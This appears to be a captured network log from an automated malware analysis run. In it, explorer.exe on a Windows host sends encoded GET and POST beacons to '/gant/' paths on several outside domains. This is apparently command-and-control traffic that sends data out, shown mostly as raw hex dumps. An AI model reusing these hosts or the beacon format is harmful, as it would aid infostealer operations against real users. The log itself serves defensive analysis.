                                                                                                                  Data Ascii: v5c_BOndjvRE8aR79RHFPOR9SSUyZDez6KQ5jD5YX4PBfWirYvK1p9(tkE3cGDw4hhbPSJE5baPlSny6FcFVQaS-5EjxACTH934mgpvP5SbWXTnmJALwjNBi2C(LGxLqivC5HktPdD0QU4afRmrlpDQ6evKl66R5Evi8rTfpO2a8J_wQ(SVSFgUrHS4rx3sJtwuDLHTV7D33EMt0s-jtjEiIX-rk652VwrLGzCNi9oyLGdgGoVL
                                                                                                                  Feb 13, 2023 19:04:55.986023903 CET1304OUTData Raw: 4c 33 79 31 54 66 62 2d 47 4e 66 6e 50 79 38 59 49 75 50 41 4d 38 62 71 62 4a 55 51 46 59 76 57 35 67 44 2d 28 61 77 35 4e 6f 63 62 55 49 41 33 7a 77 48 69 51 53 38 5a 44 79 73 71 47 43 6b 79 55 69 62 79 58 69 37 30 57 37 4e 6f 69 33 4d 49 28 4b
                                                                                                                  Data Ascii: L3y1Tfb-GNfnPy8YIuPAM8bqbJUQFYvW5gD-(aw5NocbUIA3zwHiQS8ZDysqGCkyUibyXi70W7Noi3MI(Ky-i26TgtKZP7p93BUjwQpKb6gRDTGmrh00dbe7Ae(4NK4pHl5_YN~HgWVhkpQvDFajSbeDx8IZLMlmB9w4DBL1v97rq_0tzv1a2LIZ2oprdGPukGChBoIqtYnZ~OmJgveCPyucUokV2qS_mzmv2pqRhfT11FBlCgs
                                                                                                                  Feb 13, 2023 19:04:55.986155033 CET1309OUTData Raw: 74 66 73 48 52 75 78 66 63 6c 38 73 31 30 70 69 54 59 4b 57 48 45 35 52 4b 41 53 69 6f 6a 30 54 49 38 62 70 28 57 62 49 69 46 79 45 71 51 48 6d 6e 67 7e 2d 6b 4a 4f 57 41 66 34 50 52 48 4d 34 30 72 42 54 28 76 41 4a 30 71 42 51 62 55 55 72 51 6c
                                                                                                                  Data Ascii: tfsHRuxfcl8s10piTYKWHE5RKASioj0TI8bp(WbIiFyEqQHmng~-kJOWAf4PRHM40rBT(vAJ0qBQbUUrQlrKBXwGD3YDbemLixB5ubMdrh3K04IntUqIIQWcdksmI_Lxgv7ryOEnxWwOFA~y~32tieYxor5vDvwDukEPJYPTlZCT1xvGKdc0MCuOVpFaFtdpaSk6onU5l3tBq5gi7Tzr6ypRIyrWsx5Wl7QPw0x5kXKaJodNGaC
                                                                                                                  Feb 13, 2023 19:04:55.986324072 CET1315OUTData Raw: 46 6d 61 5f 72 76 45 4d 4a 63 54 44 59 30 7a 38 6c 58 50 53 30 5f 69 73 39 6c 67 52 44 6a 4b 38 50 42 41 37 4b 42 61 4d 30 6a 28 43 45 6f 62 33 69 39 69 67 4c 74 56 61 6f 44 73 55 72 38 35 75 64 57 65 5f 4e 38 4f 75 53 58 42 4c 44 37 42 38 54 38
                                                                                                                  Data Ascii: Fma_rvEMJcTDY0z8lXPS0_is9lgRDjK8PBA7KBaM0j(CEob3i9igLtVaoDsUr85udWe_N8OuSXBLD7B8T8ngCWvzVC3C0LEASJgYAKX5DdXy5VUE7kcNcoY1N3HCGkLSdgXImgkkzjY4bfzvFLgiT0UR1VT6BwK7n1vyYyTCWkcKfRF1xHe3WJPpzosXe22iM4ndQLrkOdmMxPeoL80T1VkzsB6aEkehvG8W6QHmW8oKdnf_dge
                                                                                                                  Feb 13, 2023 19:04:56.004806995 CET1317INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:04:55 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  55192.168.11.2049910217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:58.488909006 CET1324OUTGET /gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:04:58.508574009 CET1325INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 837
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:04:58 GMT
                                                                                                                  Server: Apache
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas &eacute;t&eacute; trouv&eacute;.Il peut s'agir d'une erreur technique. Veuillez r&eacute;essayer ult&eacute;rieurement. Si vous ne pouvez pas acc&eacute;der au fichier apr&egrave;s plusieurs tentatives, cela signifie qu'il a &eacute;t&eacute; supprim&eacute;. </p> </body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  56192.168.11.2049911103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:11.735027075 CET1326OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.treebarktees.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.treebarktees.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 65 77 4b 6d 37 6c 6b 74 38 77 67 42 47 38 41 6e 6e 77 39 7a 37 62 30 69 51 37 4a 6d 74 75 62 70 75 35 6f 55 4c 59 46 71 4d 56 49 4f 59 50 4d 55 73 77 38 46 54 38 38 67 70 6c 72 76 74 70 64 52 71 4b 35 77 61 4b 6a 77 6e 30 31 5f 71 47 41 44 43 73 75 5a 44 48 48 54 30 44 52 6e 58 52 49 64 70 56 32 4b 39 50 77 44 41 34 49 77 67 66 62 6d 33 6c 41 41 4d 6f 69 4c 59 78 35 51 79 4a 6c 5f 37 7a 6d 36 36 32 6b 36 6f 59 47 70 35 30 79 65 56 34 73 69 32 2d 67 49 6e 33 4a 49 69 70 70 57 72 52 6d 70 65 31 62 31 71 30 6e 67 6f 73 73 44 68 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ewKm7lkt8wgBG8Annw9z7b0iQ7Jmtubpu5oULYFqMVIOYPMUsw8FT88gplrvtpdRqK5waKjwn01_qGADCsuZDHHT0DRnXRIdpV2K9PwDA4Iwgfbm3lAAMoiLYx5QyJl_7zm662k6oYGp50yeV4si2-gIn3JIippWrRmpe1b1q0ngossDhQ).
                                                                                                                  Feb 13, 2023 19:05:12.658806086 CET1328INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 17388
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  x-litespeed-tag: 90d_HTTP.404
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                                                                  x-litespeed-cache-control: no-cache
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf 3f 1b 0c ce 0b 5e ad 8a 94 3c 1d
                                                                                                                  Data Ascii: }k[%$E%JI$u|V5]dHj49Su{HWcR$h4Fq|7dQ-$,_j<5AwEW'o.b$\o6_RMyVTiuZ\F&?tq(CKpsQVw::FfU Oy^~{[`+)/=}c\e#O[yE6aX;IX1*~'6$*2ViDlJSV|b'I~&O.Ox3^S(t8d@XR"eHuKytXonFV'UvN~y\rq5E>qQ*ZIliU>PSi*"uF^|}?yI.6e%Kh\Y18N-?XeZ#vdjo+my:t?^y3GhA6,YdHz'@H|s#NdS/Q85?_7I ?.$lUe`'_VituWVT/L/UCi!KoX26zzNu689++gYngyXYX)@Y$?0E\|[5cf?^<
                                                                                                                  Feb 13, 2023 19:05:12.658885956 CET1329INData Raw: 6e 25 e1 f2 cb cb cb 0e ec 87 a6 61 e1 19 17 fc aa b6 39 25 44 55 1b 9c 57 66 59 84 97 5c af cc 88 cf 78 71 59 99 62 18 03 df 86 9f d8 0d 93 25 75 06 0c 95 9c 2e 7f 77 f7 23 9b ff 81 2d f9 99 06 f3 80 36 f8 ab f5 33 b4 9a a7 d1 fb 45 9c 44 67 d5
                                                                                                                  Data Ascii: n%a9%DUWfY\xqYb%u.w#-63EDgagoilYYr{~j6yLx:o~3h5ku,Apq'q/*5&%cEM\?Vq0}rz`[>
                                                                                                                  Feb 13, 2023 19:05:12.658948898 CET1330INData Raw: 83 22 f0 b2 b4 c9 0a 6e d4 f3 53 72 27 66 28 1e 19 55 96 df ab 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f 3a 60 c4 ab e3 41 08 86 76 40 20 25 3c 8d 5a 96 b0 5b e9 0b 1b 05 b4 97 25 42 32 e2 d2 48 b3 ca 28 2b 16 7e e6 91 91 a5 c6 32 9b c6 09 1f 5c 6d
                                                                                                                  Data Ascii: "nSr'f(U!bEu</:`Av@ %<Z[%B2H(+~2\mqLYjY_*bm<p:9X-!&"[O68}gFD`.nzHk^h@5[*m`YQ)=oGuLIs~$F)x-y2;t(1>wA?cA1
                                                                                                                  Feb 13, 2023 19:05:12.659003019 CET1332INData Raw: 0e fa 2b 08 a5 21 37 5c 5a f1 55 e7 94 f6 ad c1 d2 70 91 15 3b 44 bb bf 4e ff 5b 09 69 c2 c2 2a be e1 2f 08 10 15 de 0b c2 bb 89 61 06 8a 5e 0e 22 2e 53 c4 7a ac b3 0c d9 5a 98 ec e8 af c6 d3 88 fe 0a 23 c9 e6 59 89 36 f2 60 53 fd df b7 d3 8b d8
                                                                                                                  Data Ascii: +!7\ZUp;DN[i*/a^".SzZ#Y6`S'YsFb%%KpD,B{PQ2!Af(0xH9"0XA_l/iJ>v`|4k6{Qd*z0\/^Vg,,F~vXQK
                                                                                                                  Feb 13, 2023 19:05:12.659058094 CET1333INData Raw: 06 21 30 af 42 f7 1c 02 a5 78 da e3 83 c6 60 a6 9c 41 14 fc ab 60 8e e2 a5 61 dd 67 39 0b e3 ea 6e a2 4e c0 3d dc 78 7a af 18 b4 45 62 aa c7 f2 5e 16 8b ad 60 b1 5f 8d 5f 8e 82 c5 79 35 2c ae 82 45 0d ff 79 59 8e 79 0a 16 ef d5 da e2 2b 58 54 7f
                                                                                                                  Data Ascii: !0Bx`A`ag9nN=xzEb^`__y5,EyYy+XTe`Z[KjXaV3!%L3xP&A9b`kC!9_dt5WjyjM(_MTA4=qf<K8w1I6ELI,a
                                                                                                                  Feb 13, 2023 19:05:12.660254955 CET1335INData Raw: ff 42 ff 12 64 9e 64 53 b8 f2 00 16 fe 1b 47 de a7 59 74 27 96 1f 8d b1 8a 52 6b 18 d3 84 85 9f 27 04 62 93 21 ea b5 37 ff 66 6d bd c5 c2 c0 ba 9b 90 b7 6c 3a 0d 42 a7 bf f8 7a 11 57 7c 42 de ce f0 4f 7f 99 9c 25 dc c8 e3 14 50 cf 46 41 c4 e4 b2
                                                                                                                  Data Ascii: BddSGYt'Rk'b!7fml:BzW|BO%PFAb<a><6qJiofE|H:l9ogtwitMp*W91~)5Gt04JSyB;:Zg$SN[yY]!86!o#QYHl-1UG
                                                                                                                  Feb 13, 2023 19:05:12.660392046 CET1336INData Raw: 6e 18 70 91 27 40 05 93 6c 8b b9 58 62 91 15 f1 2f 10 5b 95 4c 30 56 0d ba 5c 87 5b 90 36 b5 0d 96 ae 43 b6 0f 94 4d 18 9c 9b 86 4b 96 f0 1e 5d 79 b5 92 63 41 b0 d4 46 b3 ea a2 10 91 bd af 5c 23 a2 e0 6f 46 83 7c cb da 68 8a 48 5b 3b 4c d8 32 3f
                                                                                                                  Data Ascii: np'@lXb/[L0V\[6CMK]ycAF\#oF|hH[;L2?T'Y!\k^=J`$LVGUj5%J0z3fVITNH5O$D$%6_j?r@l{Jd7WR'w=Mu.H.fdAp_`0]+O
                                                                                                                  Feb 13, 2023 19:05:12.660463095 CET1337INData Raw: 13 81 58 7d f4 f0 7d a3 9c 9c 81 9e 8f f0 f8 99 e7 29 b8 9e 32 e3 3c 01 cf 13 66 9a 27 60 79 fc 0c f3 04 24 8f 9d 59 9e 8c 62 ff 8c f2 04 b0 7b 66 92 27 40 db 3b 83 3c 05 de de 99 e3 09 00 f7 ce 18 4f 81 d7 3f 53 6c c8 43 7b e8 4b 9a 16 cd 41 bd
                                                                                                                  Data Ascii: X}})2<f'`y$Yb{f'@;<O?SlC{KAvR$}IS>-1[rA6}qYCy.zoM6Ot|/I^8,CUgg'ilujP=[=UR&2d`zpt=OT@zG
                                                                                                                  Feb 13, 2023 19:05:12.660518885 CET1339INData Raw: 48 ae 6b 24 d8 86 ed d7 cf 6c cc 3a 2e 17 ed dd 3f 8f 5c f9 ec 97 95 1a b4 70 27 48 3c 4f 27 f7 6f c9 9a e5 f9 13 29 5c e7 46 7d 75 a6 11 2e 58 35 9c ae e2 24 1a ce 0a 4c 64 11 21 89 b8 20 6a e8 f3 4d c7 a4 3d 2b b5 b0 88 f3 8a 54 77 39 bf d4 e0
                                                                                                                  Data Ascii: Hk$l:.?\p'H<O'o)\F}u.X5$Ld! jM=+Tw9IV-hzh>^/5eEx,I*f6k$yxxFQ("y/pr8abX-b(Z~c8J%+|p9NE\H\IpVr.(8\~Hl9SW
                                                                                                                  Feb 13, 2023 19:05:12.660576105 CET1340INData Raw: eb 30 f4 7f 59 41 b7 14 79 dd 6f a3 58 66 ab 98 61 02 50 2a ee 15 f4 ce 58 fa b7 2c bf a2 2c 77 6e d5 f9 57 95 68 73 a4 ae 2e bd 8e f4 1d 12 f0 71 c7 dc 39 56 c0 cd c6 20 02 c3 65 0c 2b dc da 80 81 71 a2 ce 08 ff 16 ff d7 13 ff e6 2c 28 e7 e9 bf
                                                                                                                  Data Ascii: 0YAyoXfaP*X,,wnWhs.q9V e+q,(xW@Wvrsn}pQ^kY t"rCWB=uKm]o{F<JB{':#Y[<v1i/1e@nNnLy<%-FL692r`
                                                                                                                  Feb 13, 2023 19:05:12.818463087 CET1341INData Raw: 63 26 4b 19 3f 76 a9 69 24 4f 58 c8 17 59 12 f1 02 7e 92 e6 88 fc b0 59 20 88 f3 0b e5 6a ba 8c ab dd ac 69 19 de bd 68 42 23 a4 61 8e b4 84 eb f1 08 32 72 75 31 84 61 d6 8a 4d 06 d1 73 9b 73 f9 ab 38 26 20 b5 cb 86 53 c0 bd 59 ef 5c e2 6e 2f a5
                                                                                                                  Data Ascii: c&K?vi$OXY~Y jihB#a2ru1aMss8& SY\n/tc[dvY1[M0KRNecH_Exl%mMUy*bQHoJ?{s\Is0N;t7''RdayEF!


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  57192.168.11.2049912103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:14.421080112 CET1346OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.treebarktees.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.treebarktees.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 65 77 4b 6d 37 6c 6b 74 38 77 67 42 55 49 45 6e 30 6e 68 7a 38 37 30 39 62 62 4a 6d 6d 4f 62 54 75 35 6b 55 4c 61 70 41 4d 47 73 4f 59 74 55 55 74 30 51 46 53 38 38 67 68 46 72 51 6a 4a 64 61 71 4b 6c 43 61 4b 66 77 6e 30 68 5f 72 30 49 44 48 63 75 57 4a 6e 48 53 7a 44 52 6d 46 68 49 58 70 56 36 73 39 4f 6b 44 42 4d 34 77 68 63 7a 6d 77 77 74 57 62 49 69 4a 4a 52 35 52 37 70 6c 68 37 7a 71 49 36 7a 49 41 39 36 61 70 35 55 53 65 57 34 73 74 7e 4f 67 46 6c 33 4a 57 7a 61 59 36 74 48 66 4c 42 57 65 4f 76 33 57 68 6a 2d 42 79 30 46 38 33 55 66 53 70 42 34 6f 62 7e 73 37 79 75 4c 48 35 56 4c 6a 61 39 32 39 4d 61 6c 54 69 4a 53 78 55 54 72 72 32 64 44 68 73 42 44 6f 37 6d 69 4a 54 64 6d 49 41 30 37 67 43 52 74 6d 43 77 75 65 41 58 66 36 33 32 57 48 65 30 41 69 58 6f 6d 32 70 4b 73 58 65 46 78 7e 34 28 32 7a 4e 57 47 43 39 62 4f 63 31 7a 74 4b 71 64 47 41 69 33 33 74 52 77 4e 32 32 47 4b 34 72 52 32 6b 55 61 38 48 37 38 54 5a 73 77 37 33 74 79 66 75 68 66 78 50 44 4c 44 57 75 42 43 30 39 46 6c 28 6a 31 38 48 4e 4e 65 6e 33 77 59 4f 66 48 35 4e 52 51 42 61 36 49 77 34 61 61 4c 67 41 6d 67 50 4a 72 43 62 51 49 77 6e 49 62 31 62 71 55 34 30 6f 42 68 57 50 7a 52 73 6e 36 47 49 67 50 34 5a 77 35 36 32 76 49 4b 77 38 75 55 69 57 57 4d 37 38 6b 63 52 62 50 37 66 78 6e 6d 33 51 6b 41 51 2d 7e 76 71 67 77 76 68 48 4c 71 49 48 57 55 71 33 64 2d 66 5f 58 78 50 77 39 32 49 61 74 7a 44 32 58 71 34 61 65 49 53 62 72 32 56 45 63 36 42 4b 37 5f 35 6f 4c 7a 48 46 72 6e 73 63 41 39 55 39 72 38 57 72 36 50 65 6c 55 39 41 50 4c 64 31 6a 6f 55 71 47 62 36 4d 2e 00 00 00 00 